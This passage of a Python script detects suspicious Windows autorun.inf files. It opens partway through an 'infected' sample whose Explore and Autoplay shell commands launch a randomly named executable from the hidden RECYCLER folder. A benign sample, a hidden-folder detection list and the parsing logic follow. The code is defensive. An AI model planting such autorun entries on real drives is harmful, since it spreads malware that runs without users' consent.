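shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe
"""
BENIGN = r"""[autorun]
open=setup.exe
icon=setup.ico
label=Demo Installer
"""

# Keys that start a program; shell\<verb>\command is matched by the regex.
LAUNCH_KEYS = {"open", "shellexecute", "explore", "autoplay"}
SHELL_COMMAND_RE = re.compile(r"shell\\[^\\]+\\command")
EXECUTABLE_RE = re.compile(r"\.(?:exe|com|scr|pif|bat|cmd|vbs)\b", re.IGNORECASE)
# Folders a user does not normally see in Explorer (assumed list).
HIDDEN_DIRS = {"recycler", "recycled", "$recycle.bin", "system volume information"}


def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section, keys lowercased."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
        elif section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def analyze(text):
    """Summarise what an autorun.inf would launch and why it may be suspicious."""
    entries = parse_autorun(text)
    launches = {key: value for key, value in entries.items()
                if key in LAUNCH_KEYS or SHELL_COMMAND_RE.fullmatch(key)}
    reasons = []
    for key, value in sorted(launches.items()):
        parts = value.strip('"').replace("/", "\\").lower().split("\\")
        if any(part in HIDDEN_DIRS for part in parts[:-1]):
            reasons.append(f"{key} runs a program from a hidden folder: {value}")
    executables = sorted({v for v in launches.values() if EXECUTABLE_RE.search(v)})
    if reasons:
        verdict = "suspicious"
    elif executables:
        verdict = "launches-program"   # normal for installer discs; review
    else:
        verdict = "no-launch"
    return {"verdict": verdict, "executables": executables,
            "launch_keys": sorted(launches), "reasons": reasons}


if __name__ == "__main__":
    for name, sample in (("infected", INFECTED), ("benign", BENIGN)):
        report = analyze(sample)
        print(name, report["verdict"], report["executables"])
        for reason in report["reasons"]:
            print("  ", reason)
```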